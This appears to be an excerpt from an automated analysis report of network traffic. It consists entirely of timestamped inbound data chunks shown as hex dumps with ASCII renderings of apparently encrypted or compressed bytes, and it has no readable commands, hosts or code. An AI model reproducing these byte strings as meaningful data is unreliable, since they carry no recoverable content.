                                                                                                                                                2022-09-29 12:51:30 UTC7681INData Raw: 7e 50 18 f1 ed 79 ec e3 e3 63 33 43 f2 c8 1e 60 1a 27 5f 6e 6d 39 f8 39 9c 01 61 b9 23 e0 53 e5 ba a8 67 c6 7b 34 18 02 9f eb 1b c6 e4 cd 7c 7e 63 59 04 32 86 00 0f 1d 3f af 4e 57 a1 c0 70 fc 39 05 5d f6 e2 6b 8c 78 2a 0d 0a de 6b 26 a4 da 5c 71 92 f8 0a 3b 5d 10 29 d1 66 01 6e b9 0b 3b 24 90 10 77 51 67 85 b4 c6 8f e5 3c 95 eb 51 59 37 d8 69 cb 1c 95 2e 4e f4 2b fa af d8 65 dc 1a 78 76 c8 b4 7b 7b 2b d9 82 86 dd 32 38 54 a7 03 25 5c 8f 04 3a 23 63 52 23 c1 d6 65 01 da b0 90 a5 e1 b8 90 83 69 7a 4a ac d5 c6 4d fb 66 6e 98 ea 83 66 3f 94 e9 0c 27 cc 58 3e 6d 52 ba 42 1f 7e 5c d5 64 aa 39 f0 aa 54 3f 0b b2 58 86 d8 42 2c 60 3a bd 03 02 79 63 3b 04 60 c4 e3 46 a7 35 4d 5d 35 c9 8f 76 9c ce fc 39 65 e9 40 a2 d4 30 1a 32 4f 8c 2e 17 c5 23 2b 17 db 51 d3 13 a2
                                                                                                                                                Data Ascii: ~Pyc3C`'_nm99a#Sg{4|~cY2?NWp9]kx*k&\q;])fn;$wQg<QY7i.N+exv{{+28T%\:#cR#eizJMfnf?'X>mRB~\d9T?XB,`:yc;`F5M]5v9e@02O.#+Q
                                                                                                                                                2022-09-29 12:51:30 UTC7697INData Raw: ed 2c ac 5d 82 38 2c 1d 97 67 25 31 a6 1b 96 38 c1 4a 3c 32 49 fa 80 60 79 1d 73 a0 6b bd 0d ef 05 bf 2e 3d 5f c4 bf 27 1e 11 04 84 d5 8d b2 32 a3 79 ca 2e df 4a de fa 12 7b 36 1b 57 f6 54 ca d5 b0 c4 5b 09 2f 29 bb 4d 5f 50 1d 21 db 78 ae 2e a1 71 e9 af 85 ba 52 41 1c 47 82 c5 13 22 11 5c 83 66 12 ca dd fc 74 f3 12 5e 4c 16 29 a2 45 37 86 53 05 94 85 6b cc 92 1b 4b c1 80 4a ef 45 2c b4 3b 21 d7 41 86 b1 d9 22 7d c4 59 a1 bd b3 72 4d df e6 d6 13 b0 b5 91 79 e6 f0 60 19 e0 10 b5 2d ce fa 42 4f 90 cf 95 90 88 82 7d 47 fb af 14 8e 62 89 58 fd df 36 8a e5 45 30 99 e6 48 f2 46 5a b5 48 03 f5 5a d9 7e 85 a0 04 5f cf ac b8 43 2d c7 13 98 f2 56 fe cb 20 74 a7 b6 28 52 1c 2f b7 40 7c 41 8c 2a a5 8b 6c 8c c7 6b b3 e5 de 61 44 74 40 58 f5 1a b1 98 14 ac db a8 13 d5
                                                                                                                                                Data Ascii: ,]8,g%18J<2I`ysk.=_'2y.J{6WT[/)M_P!x.qRAG"\ft^L)E7SkKJE,;!A"}YrMy`-BO}GbX6E0HFZHZ~_C-V t(R/@|A*lkaDt@X
                                                                                                                                                2022-09-29 12:51:30 UTC7713INData Raw: cc 9e 4b 3f ea 93 1a 50 81 21 f5 42 c6 83 9d ca 9e 88 52 80 a0 51 99 d8 ad de 9d 07 21 8c 17 ed 94 7d 73 d2 81 39 3d 53 09 9f b5 e8 c4 bb 0d d6 4f 18 3f 93 8b 2c 97 1e 34 1c bb 67 3d 6e c6 ad 50 44 b7 e3 be 7e 3e 00 88 b5 ee 40 11 61 03 d3 d7 78 e8 57 4c d4 b9 7d 33 6f 32 60 0c 1a 10 5c 17 75 48 05 6d 9e b7 98 e7 5e 68 11 ce c5 52 f8 9b 1b 1b c7 17 af 9d bc 45 f5 8e 83 b6 4b 98 3f 63 0f 01 bb 0e 3d 2e 83 59 40 19 c6 3d ef 24 17 f4 62 51 b5 93 d9 0a eb c2 71 94 33 eb 29 23 ce 7c 87 0f 10 19 bc 01 5d c4 18 e0 2f 92 d3 73 bd 66 6b 4d 71 37 7e bd 63 41 36 7e 4f 0f 6a 43 79 ec e8 00 fe eb 0d 87 a1 3f e6 d4 31 4f f6 e5 8c 41 e9 40 c8 cb 09 d3 54 8c 56 d4 d2 ad 61 3e 7e 82 1c 4c 69 74 65 d7 d3 21 f1 53 51 b2 10 92 a6 6a b4 1c fc 7c 97 30 bc bb 3d b1 e3 a6 be 4a
                                                                                                                                                Data Ascii: K?P!BRQ!}s9=SO?,4g=nPD~>@axWL}3o2`\uHm^hREK?c=.Y@=$bQq3)#|]/sfkMq7~cA6~OjCy?1OA@TVa>~Lite!SQj|0=J
                                                                                                                                                2022-09-29 12:51:30 UTC7729INData Raw: 42 96 83 f2 ef 24 9a 23 bd ed 4c 1f f4 d7 a3 86 2d 5e b3 53 83 88 1a 78 a7 0b af 9b 0a 15 e4 30 35 28 65 1e cd 7c 18 58 48 5b d8 8c a0 dd e7 63 c6 e9 27 86 99 cc 86 be b9 a0 81 58 48 48 ce 4c 40 73 af 3b b1 7d 5d f7 bf 6c b3 ce 4b 9d fd 0d 2a 88 c9 9c c6 1b f7 44 5f 4c bc 89 60 44 2c 6d 7d e9 11 29 70 fe 44 20 b0 7e a0 ef 6a 14 7e 4a 1a 62 79 8f 27 b6 c8 11 58 8e 49 d5 59 16 6c 43 ad fe 11 4a 02 c7 a7 ab ed 1e 29 16 33 63 2d db b7 3d 91 43 94 77 da 63 84 97 7f 0f bc 96 ac d1 28 1a b7 3b 88 c7 7f 3a 6c 52 7a 22 a6 3c cd b0 1f cd 8c ea c6 4f 0c dc 05 fb 5f db aa 18 00 5d 21 a2 05 f4 58 8f de ad 02 0e ed 62 83 90 7f 39 40 0a a2 2d 8b 54 77 0b 7e 47 b2 79 06 cd e9 cd 54 6a a0 a9 38 6e 78 55 8a a4 b7 f0 67 e8 8c a1 00 f7 60 c3 c8 dd 45 6a ed 53 80 39 37 a7 47
                                                                                                                                                Data Ascii: B$#L-^Sx05(e|XH[c'XHHL@s;}]lK*D_L`D,m})pD ~j~Jby'XIYlCJ)3c-=Cwc(;:lRz"<O_]!Xb9@-Tw~GyTj8nxUg`EjS97G
                                                                                                                                                2022-09-29 12:51:30 UTC7745INData Raw: f8 b1 20 79 03 f0 41 62 b0 e7 ee 80 e8 1c 9f 41 da 30 5a 65 c7 61 ec 36 3d 57 4d f3 23 76 20 02 8e d2 72 71 ca de f5 9d da 79 34 fb 6f 45 da 8e b4 4a 58 77 9d e3 fb 08 aa 5c 47 e9 dc e1 13 6f 41 a5 34 eb fc 29 d6 5b 24 8a cc ce a8 3d bb c0 c6 57 82 70 dc 63 98 db b9 50 db 7c 09 24 78 9c 2d bb 5b bb 98 7d 5f 27 26 04 b3 bb c8 1b c6 f2 7d 0f 28 06 75 7c 31 ed f2 9a ae e4 4f e6 37 e1 77 6c 1c 50 cf 3c 05 11 3d 77 c3 50 69 17 43 c5 36 7e 0b 12 2e c2 cd 40 ce eb 80 be d7 7d 61 27 06 e1 dc a4 7b 4a 2e cc 39 6f 0f 4d f4 37 1d 10 58 c8 38 d7 ae 71 a5 50 b2 03 7a 3b 6a 56 84 1b 3e 2d 4c 3a e4 90 ea da 8e 66 0d 5a 74 2e 2d 73 72 0f b3 22 8e fa 1a 91 30 0e 67 3a d9 fe 2c a2 f9 8d 19 7f 05 83 f7 6b 54 2a 35 01 98 c1 d0 6f 5c 8c 98 26 29 2c ae 21 ff bb 42 e6 63 18 8a
                                                                                                                                                Data Ascii: yAbA0Zea6=WM#v rqy4oEJXw\GoA4)[$=WpcP|$x-[}_'&}(u|1O7wlP<=wPiC6~.@}a'{J.9oM7X8qPz;jV>-L:fZt.-sr"0g:,kT*5o\&),!Bc
                                                                                                                                                2022-09-29 12:51:30 UTC7761INData Raw: e9 41 c4 c9 43 a0 df 4e 78 06 cb c5 67 89 72 3b af f6 e3 be b0 7a b6 1c 7c 63 e0 69 59 93 7e 56 b5 3b dc e2 18 7c 05 89 e3 9f 68 36 5f c9 29 56 b5 7d cd c1 e1 a2 01 d0 4f de 2a b0 b6 1e 0f 4b 46 b1 d2 f1 39 9c 85 99 a9 8d d9 43 1e 37 1c cb ef bc 99 53 69 d6 3c f7 a6 54 9c 3f 25 9a 76 90 54 15 1e 80 de bb 89 31 ae 40 99 d9 89 f0 da 0b 4b d1 6f 67 fa ae 4c 4f 2f 7f 72 f9 12 0a b2 ad fa aa b2 42 77 87 75 99 bf 39 b6 2c e6 07 4a fc e1 c1 30 90 dd 0b 9f e9 d9 ce ce db 1b a1 e5 ee 4a cd ca ef e8 91 0a 15 c6 a0 bb 23 01 7a 8e ef 4b 8e 51 87 a0 46 46 ec f0 ea 6c 78 62 24 69 1c a2 2e af 51 76 19 c9 57 26 3b 5f e6 b9 49 1a 2f 21 64 fb 0e 87 4b e4 b2 d2 18 b2 59 5f c8 75 13 e8 4a a7 83 bb 75 e1 97 70 7f 0b 1e 06 83 96 2c 42 fc 3d d1 6b d1 19 d8 0e 2d 5e 5b cf 89 99
                                                                                                                                                Data Ascii: ACNxgr;z|ciY~V;|h6_)V}O*KF9C7Si<T?%vT1@KogLO/rBwu9,J0J#zKQFFlxb$i.QvW&;_I/!dKY_uJup,B=k-^[
                                                                                                                                                2022-09-29 12:51:30 UTC7777INData Raw: 1e 2f 5f 54 f0 86 7e cb 29 0e 96 1f 88 49 9d 1e 1a 3e d5 f3 b8 32 9a 2b 49 43 4f c3 a9 c2 69 f3 a2 34 0b c8 51 25 1f 0e 99 d9 35 bd 60 b3 7a 83 a2 4a ce 00 3c 21 ee 24 eb 48 3f 5a a4 88 20 8b 8f 9a 28 a9 e6 c4 6c 8c 55 3c 8d ff e8 72 a0 e0 6f 11 c7 2a e3 69 05 37 86 4c 67 a3 2e 2b f4 56 f0 c9 12 9b 95 5b d4 df 1f 74 14 c8 45 83 f9 f7 ab 14 ec 24 75 31 21 10 5a 59 de aa 58 0d 36 c5 d8 9b 40 f8 0c 00 42 ff 93 81 4d 8b 9e da f9 e6 19 d1 f9 72 8e e9 e6 c5 49 a8 94 a9 4b ab 10 6f 8f 23 d0 c8 36 7f be 4c e4 f5 62 70 b0 b5 05 5a 66 b8 17 21 fa 37 8c eb 48 46 6e af 66 b5 11 5b 9d cd e1 bf 93 f3 bb 68 1e 21 81 49 05 12 36 b0 47 1e 34 2d c6 65 7c 94 13 68 27 60 43 1b 5b ce c6 5a b2 c4 97 86 a5 9b 0d 36 ab 06 08 a0 b0 ac e9 ac 5e 31 1c 16 d9 7c ad f6 26 51 39 a7 ca
                                                                                                                                                Data Ascii: /_T~)I>2+ICOi4Q%5`zJ<!$H?Z (lU<ro*i7Lg.+V[tE$u1!ZYX6@BMrIKo#6LbpZf!7HFnf[h!I6G4-e|h'`C[Z6^1|&Q9
                                                                                                                                                2022-09-29 12:51:30 UTC7793INData Raw: 61 09 c1 f2 79 5a 94 88 e3 10 14 e7 e0 aa 19 9e 07 95 4e 0f e1 1a aa 53 9b 28 63 b5 d6 42 e9 79 0f d3 3c 9b ba f1 b6 29 fd 77 fe 43 bf fa 2d 52 0a 10 d6 14 3d ad 00 1a 2e 59 25 3a f7 a1 38 c3 df 2d a7 f1 e5 34 4a b8 10 96 1e 4d cf 2d f0 44 06 58 53 01 d7 0e 20 8b ca 8b 8b e4 07 23 c2 83 c4 12 f7 37 12 d9 a8 33 c8 e1 ec be 82 45 b7 c0 d4 0c 82 77 86 5f a4 41 11 17 fe 35 8c 90 91 2c 95 96 90 e4 29 c5 e6 11 4c 86 fd c3 ad 2b bc dc 41 f1 cc c1 b2 b1 49 71 a8 57 5a aa 9f af c3 59 39 ef bc 38 ed ac 05 20 9f ee 25 85 e5 d9 f6 66 01 15 67 b0 1d 06 f3 35 19 57 f8 ac 65 0a 8b 47 5d 2d ba 0a 56 08 47 b3 08 71 7d 3f 6f 6c 3e 80 84 06 e3 2b 7a a2 bb 4a 43 ce f7 f4 97 c1 a0 7c 45 a1 6b 7c 90 b2 db 77 8c c9 1e ee 9a df 78 46 16 e0 2a 09 43 af ee 7f ce b7 b2 94 89 10 51
                                                                                                                                                Data Ascii: ayZNS(cBy<)wC-R=.Y%:8-4JM-DXS #73Ew_A5,)L+AIqWZY98 %fg5WeG]-VGq}?ol>+zJC|Ek|wxF*CQ
                                                                                                                                                2022-09-29 12:51:30 UTC7809INData Raw: 70 9b 0b 4a ca 86 9e 53 10 1f 8b d4 44 f5 1c 22 23 c0 04 96 54 1e 19 67 3c 04 51 44 d5 9a 76 05 5b 25 41 49 e6 e5 73 91 43 29 1c 0e 1b d4 3b fc b5 bc bd 9b b8 01 c9 65 1e 46 68 0a 89 ca 43 ce 83 28 1d 16 5b ea 6e bf 6d b2 fd 80 6b 42 c4 81 24 1f 48 4a bc 55 eb 4d 31 ac 36 f4 ae 34 1f 38 60 e3 74 17 d7 3b 9c 2d e6 21 dd 4f c7 88 38 a7 f4 14 50 cc 5b df cd 19 39 8e 35 b1 9f 5f 81 96 0f 7d 28 63 2c 73 5c ca 91 f4 62 1b b0 c0 2a 1b ba 92 63 13 eb 80 ba 34 2f 0f e3 e2 63 a1 43 70 0c da 2e a4 6a 23 22 18 8d 16 7b c4 b1 52 e5 3d 97 ab 60 83 7b b7 91 90 8e 84 ab 11 75 7e a8 48 56 f4 72 0b e0 cb b1 bb 46 dd b8 7e b3 8d e4 a2 1b 4f 61 82 19 0f 52 08 e7 74 23 92 1c 54 db 5f d6 32 ec 1b c6 44 4d a7 fa dd 14 d2 d8 24 92 58 07 83 ef b2 ef ec b8 dc b6 15 6c c8 71 c6 4b
                                                                                                                                                Data Ascii: pJSD"#Tg<QDv[%AIsC);eFhC([nmkB$HJUM1648`t;-!O8P[95_}(c,s\b*c4/cCp.j#"{R=`{u~HVrF~OaRt#T_2DM$XlqK
                                                                                                                                                2022-09-29 12:51:30 UTC7825INData Raw: 6e 18 88 1f 51 53 6c 0a c3 58 c3 54 86 19 b3 cc 87 01 80 4c e2 05 cf 85 74 e2 55 af b4 87 7f 2e 84 b7 55 02 c0 83 2e 63 0b 31 0d 7b 91 d0 42 95 82 23 ad bc 7e e1 96 c2 f3 5a 8d 67 bd 04 a2 05 95 79 02 d0 18 1d 48 16 66 0f 37 d1 bf 7b b9 87 37 dc 7c 11 2c ba d2 d4 57 c4 61 17 08 f6 f5 3a 3f 23 e9 45 b6 a8 f3 2d b6 91 68 78 62 23 24 a4 b1 69 02 cb 0b e9 f7 99 1a aa 94 6a 85 02 5a 44 4f 25 30 69 ba 2e d6 02 31 6d 88 1d 1e 60 21 55 b8 86 87 0b 76 54 cc cd 89 fb 51 a9 56 14 b3 16 db d2 8e 37 91 08 bc e5 69 53 94 a2 3c 3a 95 b4 66 f3 b1 ab 78 a9 50 f3 f3 a9 a0 87 9b e3 be ff d3 20 59 68 d2 23 f7 49 da f4 ad 87 4d 66 f6 ee a4 f8 75 08 ba ad 9d 40 08 f6 90 3a 30 13 da 72 be df df f2 0f 86 15 5b 38 f8 0f ab 2a 58 98 12 70 34 ec 48 43 dd fc f4 f9 33 55 60 cb c7 66
                                                                                                                                                Data Ascii: nQSlXTLtU.U.c1{B#~ZgyHf7{7|,Wa:?#E-hxb#$ijZDO%0i.1m`!UvTQV7iS<:fxP Yh#IMfu@:0r[8*Xp4HC3U`f
                                                                                                                                                2022-09-29 12:51:30 UTC7841INData Raw: 64 54 3e f3 ad 7c db a2 b7 11 a0 8f a2 63 d0 e2 6e 65 d0 63 ae dc 7e 59 19 be d7 0c d8 44 c3 34 f3 47 6b ce 54 a9 73 95 42 3a c3 13 bb 3a 6b e5 aa ec f2 00 fc 38 c1 5b 5f ad 61 0d f7 60 a3 29 03 39 cc 38 22 de 0e f9 ed e2 08 58 85 97 12 49 4e ae 5b 88 ea 86 e4 63 ec f7 98 3e 22 34 16 d7 bb ce 2b 3a dd 52 67 d1 9d eb 95 6b b0 af 1a f2 cf 6e 04 98 8c 63 28 f1 29 fc f3 dd 2f 80 0a 2e de 80 63 f3 dd a4 9e b2 d5 8a 2e 7b 17 ce f2 f2 cb de fb 24 2d 04 2a cf 2f 1e 7d 61 cf 6d 74 41 e4 0e 5d f1 50 c5 33 3b 65 6f de bb 2b c6 d9 ea 9f 82 26 16 58 45 93 1e f7 9e 2a 3f 0a 85 55 e2 e2 cb 2a cc 93 95 d1 a7 97 c2 6a d7 95 5e e1 26 da 78 97 f9 59 b4 8b b3 39 8e 48 fc 9a dd db 1a e0 3e ec ea b3 32 82 2d a5 91 9b 10 a2 a3 52 c0 4c 09 89 e2 c7 35 27 6b bc 00 19 2c 20 34 ac
                                                                                                                                                Data Ascii: dT>|cnec~YD4GkTsB::k8[_a`)98"XIN[c>"4+:Rgknc()/.c.{$-*/}amtA]P3;eo+&XE*?U*j^&xY9H>2-RL5'k, 4
                                                                                                                                                2022-09-29 12:51:30 UTC7857INData Raw: d7 e4 07 33 60 31 81 28 8d 71 17 19 ba d5 55 0b eb 0c 00 53 b5 55 4e 2e 10 04 1b 1d 9e 98 26 f9 77 bf db 7a c3 42 92 f0 71 17 aa c3 84 23 7a b0 29 85 af 22 d3 40 77 af 52 a4 5e 6c 56 f9 09 f4 30 07 aa 74 7b db 47 90 eb 97 2d fb b9 23 ff d5 a1 dd 0f a9 a1 23 d1 52 52 f6 1a 8e 55 9d fc c7 3b bc f9 86 ec 46 e7 b8 fa 4e ac eb a5 15 31 78 82 4a a8 3a 64 c7 52 09 97 a3 d3 5e 5c 2c 1f 5b ff a6 05 ca 81 c0 8b d6 34 1a 98 d5 0a 37 07 d2 9d 0b 00 fe a6 03 4e 4d 47 42 19 0f eb 8c 6e ba 49 72 56 3a 2e 1b b0 fd ca e9 76 d7 79 f3 f8 4a ce 32 fc 2d 27 8b 73 29 df ab 7f df 55 aa df bb 9f 2c f9 a6 d5 40 09 fb b3 58 a7 1e d3 f7 df e9 a4 5f 7f 00 7c 86 92 83 64 cc 03 9f 9c 9a 4f 07 b0 8b f5 95 7b 8a ab f9 1e 9b bb d1 04 54 06 e4 ec 92 17 fb c4 ae 3b cc f4 b0 6e 7b a5 48 c6
                                                                                                                                                Data Ascii: 3`1(qUSUN.&wzBq#z)"@wR^lV0t{G-##RRU;FN1xJ:dR^\,[47NMGBnIrV:.vyJ2-'s)U,@X_|dO{T;n{H
                                                                                                                                                2022-09-29 12:51:30 UTC7873INData Raw: f5 4a b6 7e a7 8e d6 ae 7c a9 eb 17 7e 1e 4d b3 e4 8d 1c f5 a6 25 46 11 51 44 28 8b 04 9f 29 9a 2b 38 32 10 2b b0 bb e6 da 1b 96 0a b9 b8 d5 85 e5 22 a6 96 5c 27 bd e8 fa 6b 11 70 45 d7 47 14 4b 10 3b bf 74 4d 52 25 07 f8 71 70 11 0d b4 6b 81 a6 9b d9 05 72 ad a0 ed ab 40 f8 c1 90 03 32 16 1e 5f 9c 3e a0 b0 55 0b 43 d2 b8 44 12 da f2 6c 29 6a 99 9b a4 51 8c ba 36 bf c9 3a e7 7d 7a b5 29 47 9c ab 34 d7 97 92 5d c0 d1 6b f6 58 f5 8e fa bb 0d 73 18 fe e5 1a ec 32 dd 28 1e c7 50 f2 a1 bd 02 5f a7 de e6 86 e6 05 ac 22 c7 b3 b9 fa 0b 56 01 bb 16 29 42 6f a3 ef f3 05 2b c5 24 ca aa 44 20 8f a2 55 06 bc 9a b3 f7 72 ed eb a8 26 e5 9e e3 cb be 67 24 d2 54 76 83 05 ca 26 cc 28 d8 92 79 6b c0 75 34 eb 93 08 b6 94 f5 aa 9c f2 4a 08 ff f7 a2 e1 00 97 08 1e 21 80 4c 4e
                                                                                                                                                Data Ascii: J~|~M%FQD()+82+"\'kpEGK;tMR%qpkr@2_>UCDl)jQ6:}z)G4]kXs2(P_"V)Bo+$D Ur&g$Tv&(yku4J!LN
                                                                                                                                                2022-09-29 12:51:30 UTC7889INData Raw: a5 7e 8a 9a c0 24 d7 c6 ab 8c 94 12 f0 5f d4 e5 af 01 fa 57 97 5e 1e a0 73 42 68 6c 8a 7b 45 e0 fa 01 8d 6a b3 c6 60 23 c2 36 e9 41 0f 6f f9 2c 98 78 9d 4f fd 43 cb 4e d0 cf 98 73 d3 ac 9c c1 5b e2 21 71 04 10 81 fb ed 79 18 56 34 fc c3 a0 f5 c0 50 f7 76 f9 48 9b 34 99 4f ed eb 10 ca 6e 2d df ac 50 76 1a 84 c8 de ae 14 a0 1c 6c b4 5f d1 1a 46 c2 1e 8b e7 32 ce dc ef 51 af 82 d5 b2 53 89 b5 15 a9 7e 0d 84 8b 2d 84 56 ec a2 03 22 de 89 93 10 f6 ad ba 33 db 56 ab 7f e6 26 26 ce 3a bc 17 c9 c0 db e2 1c 8d 0b b3 ee 61 8c 5e b8 90 2d ba b6 3f d4 0f 70 17 d2 34 89 29 26 82 4d d3 e3 9a f6 9a e0 b6 d0 86 a1 73 e7 96 bc c3 90 14 90 0b 80 4f ee 33 a7 49 56 c3 94 ea 93 73 bd 28 f5 5c be 43 96 cd 88 fe 51 e7 3b 46 a9 9a 87 6d 5d 0b 16 74 81 fb ae 7e 87 2a e6 b4 13 98
                                                                                                                                                Data Ascii: ~$_W^sBhl{Ej`#6Ao,xOCNs[!qyV4PvH4On-Pvl_F2QS~-V"3V&&:a^-?p4)&MsO3IVs(\CQ;Fm]t~*
                                                                                                                                                2022-09-29 12:51:30 UTC7905INData Raw: d9 a6 fd 9f 73 52 b7 af 6a 34 69 c3 53 f9 58 7b 4d 7a ff 59 46 4e 47 93 7c e3 a9 3a b5 92 68 41 c4 4b c4 23 42 68 e2 06 3a 13 c2 46 db f4 43 ab 84 9c a8 06 cd 2a 4d 55 4f ba 42 e8 7f 4d 8e 63 19 00 6b 83 d2 a4 3d 8c 2d 88 d7 39 f1 ed ba d8 31 98 2b 8d 43 d1 ed 65 bd ca 9b 48 7e 05 08 32 50 27 93 0a 45 43 c3 34 72 90 2e 83 28 a3 60 e2 4f 39 d5 43 7d 3a a7 5e c0 61 9a 81 ba 8b 54 5b 9b 4d 84 46 17 ce a3 43 99 20 68 c2 7c b0 7d d9 42 01 da 0b 48 06 d1 2b b1 0d 2e c1 1d ee c0 e9 53 3c fe 8b d4 78 c4 26 3d aa 0c c3 9c c2 92 fc 5c 8b 68 1c 0d e1 33 f5 36 0f f4 6e 36 38 26 d0 c2 f6 14 f9 1d 4a 42 39 5f c5 26 47 a5 fd d5 9e 09 6b f5 fb 62 40 cd 37 8f 22 ec e2 d4 77 e2 53 6c 55 58 51 74 09 42 cf 95 b5 3c 80 97 22 6a f8 5d 1a aa 66 ba 33 65 73 ca c2 dc bf 72 00 f6
                                                                                                                                                Data Ascii: sRj4iSX{MzYFNG|:hAK#Bh:FC*MUOBMck=-91+CeH~2P'EC4r.(`O9C}:^aT[MFC h|}BH+.S<x&=\h36n68&JB9_&Gkb@7"wSlUXQtB<"j]f3esr
                                                                                                                                                2022-09-29 12:51:30 UTC7921INData Raw: c1 00 f4 85 bd 94 cb a9 2d ef ed 7c 27 1b 4f 1c ac 25 c6 ee 77 eb 27 ff f0 55 54 e5 e1 ff 92 cc bf 90 6a c3 1f dc c8 24 a9 40 bf 6e 5f 64 bd 01 d9 78 5c 1d 57 2e ed 72 76 18 cc da f5 ae 1b 66 a2 6a 35 5b a2 e1 95 26 ad 48 f1 d8 6e 44 66 a7 ef 21 5d 11 47 1f 65 9a 62 f1 60 5a ff b2 7c 3c e0 90 5a 36 03 44 4d 68 50 f0 08 24 cb 39 b6 40 43 7e 43 4f c2 bb 3b 93 49 e1 cb e7 05 b6 47 1c c9 6a f9 f6 46 01 4c e8 a4 7b 28 68 ef ea e3 b2 50 0e 74 8d e4 84 ae 7f 51 a3 66 d9 02 0a 23 24 72 ac 07 d4 e1 d6 d5 ac cc 38 1c c8 e1 21 ac 81 67 b6 59 7e 84 05 85 dd 10 51 c9 3e 2b 0e 6f d4 07 9c 36 34 cc 92 42 20 15 81 22 64 f5 69 32 16 c8 ad b1 fc 49 ee 6b 8e ee 04 ac c4 8b 90 ba f1 c9 38 e9 28 97 3c 75 61 74 39 86 cb 11 85 31 51 c0 67 ef b6 a5 31 f0 27 79 28 6f c1 47 4a 7c
                                                                                                                                                Data Ascii: -|'O%w'UTj$@n_dx\W.rvfj5[&HnDf!]Geb`Z|<Z6DMhP$9@C~CO;IGjFL{(hPtQf#$r8!gY~Q>+o64B "di2Ik8(<uat91Qg1'y(oGJ|
                                                                                                                                                2022-09-29 12:51:30 UTC7937INData Raw: 6a f6 30 73 64 fa b9 34 25 4b a1 3b e4 18 7a 71 8a 17 aa 38 ca 2e 9c d9 e4 6d 2e 04 f5 25 81 25 5b 4e 2f 67 97 82 a6 39 fc 23 9f 8f 11 93 bb cf ae 9f e4 ae 07 f1 5e a5 83 5f 0c a1 66 dd 06 18 09 75 2a 7e 73 34 69 eb 34 fb df 19 ec a8 be bd ee ac 4c 91 2b 3b e4 6f e8 1e ca a4 53 9a 2c 6e cf 7f 06 62 ad a1 c9 3d 00 4d f3 4b ab ed 07 7e c6 dd 82 9d b0 60 8e 89 a1 b3 41 b3 e7 83 5a 59 e1 32 85 c7 a0 d1 5d 67 87 03 3f 75 3c 4c 68 f2 a5 29 c2 fd 71 1a 8f 58 2a 64 a0 50 9f bc 8a 8b f6 64 03 93 5c 3f 07 4d f2 f2 a2 00 d5 25 04 4d 45 fe 8f ab db 05 78 97 6b 21 26 ea 41 a5 9a 1d dd 23 9f f0 c6 33 b2 5b a3 78 ba 83 a4 46 0b f6 7e 0c d1 f1 27 d7 fc 6e f5 08 9d 5d 8e 87 91 28 51 05 d4 64 59 0b 39 98 67 0a aa e4 9d 24 13 55 0d 9d 50 76 bd e8 5a ce 93 9f 5d 7c c2 94 17
                                                                                                                                                Data Ascii: j0sd4%K;zq8.m.%%[N/g9#^_fu*~s4i4L+;oS,nb=MK~`AZY2]g?u<Lh)qX*dPd\?M%MExk!&A#3[xF~'n](QdY9g$UPvZ]|
                                                                                                                                                2022-09-29 12:51:30 UTC7953INData Raw: f9 e5 9e aa 70 41 ee c2 99 15 b2 a3 37 40 e2 8c 65 e8 70 9c 27 dc a7 b1 2d 31 2f fa 6d 7b 95 54 c4 02 08 46 02 46 4a a9 9d 35 ba ef 8d 93 3e f4 fc 60 72 c2 07 da c1 dc 6c 1f a5 ca 32 27 fb 87 d7 86 42 05 2e 30 09 d3 28 53 aa fd fc a5 46 6e 4e a8 03 a1 43 31 2c b6 33 92 2a 27 04 61 5e 0f 46 ae ba 01 22 a1 2d 7d c0 32 e8 a1 c8 f3 5a 48 38 0d df 17 a0 9b ef 32 44 65 e0 0f 6f 9c 6f 8a c0 89 78 2e ae f9 66 90 55 d0 33 ea d0 aa 90 f0 01 4c d7 09 b4 61 d3 ea 92 3c c8 e6 eb aa d2 5f 8a 7c 87 6a 5e 92 d0 f3 b8 a0 75 82 40 51 e7 bc 95 0a 80 0f 3f 40 8f 42 14 23 bd ff 79 43 9e fa 3b c9 64 d3 c8 eb b7 e2 56 d4 38 cb d3 c1 bb b1 d2 e8 75 32 e7 94 68 54 37 40 4c 3f 6f b4 36 f1 12 1b 9a af 53 8a 91 2c 24 2d 63 9d 13 08 27 7e 3c ed 35 20 c5 f0 ba 74 82 32 09 f1 a2 a4 c5
                                                                                                                                                Data Ascii: pA7@ep'-1/m{TFFJ5>`rl2'B.0(SFnNC1,3*'a^F"-}2ZH82Deoox.fU3La<_|j^u@Q?@B#yC;dV8u2hT7@L?o6S,$-c'~<5 t2
                                                                                                                                                2022-09-29 12:51:30 UTC7969INData Raw: e1 59 91 57 71 ad b1 60 d7 58 a5 94 5c 8d d7 2e ca 98 e3 91 ca d0 02 fe 51 c1 3b 97 ca 9f f2 63 0c ed 65 e5 1c 22 d7 08 f8 4a 1a bc 53 ae c9 0d c3 7e 32 df 1a 57 0e a9 90 f2 21 0a 0e a3 18 65 6d 81 dd 42 9c 36 95 74 79 f9 ed 0d 80 ec d6 11 c9 db ce d1 12 17 b3 5d d2 36 d6 97 c1 9c 8d 1b ff bc 63 51 d2 9c 10 1a b8 e3 d2 33 d2 35 a1 42 bb 92 b6 ec 73 80 95 f9 fd 9d 76 06 8e e9 36 6f a0 6e 07 24 8a 21 b4 64 d4 40 2f fc 02 5b 1e 95 75 91 5a 2d 83 d5 4e e4 d0 81 c1 92 4a 61 b5 92 33 82 d1 5b 18 ae a0 88 11 9f 03 90 1f 83 06 7c d5 49 ef 8a 8a 79 14 a8 9e c3 07 f2 28 43 0b a7 7b 7a 91 1b fc 73 e0 ba 9d c7 ef eb 4e 5f 6b f5 28 6e 0f d4 28 53 cd ea dc 7d 92 67 65 c5 d5 a3 02 92 79 7f f6 e2 68 8c 1f 2f 00 33 94 20 62 96 15 25 d0 33 70 b7 fb 5b 61 0b b3 cf a0 b7 56
                                                                                                                                                Data Ascii: YWq`X\.Q;ce"JS~2W!emB6ty]6cQ35Bsv6on$!d@/[uZ-NJa3[|Iy(C{zsN_k(n(S}geyh/3 b%3p[aV
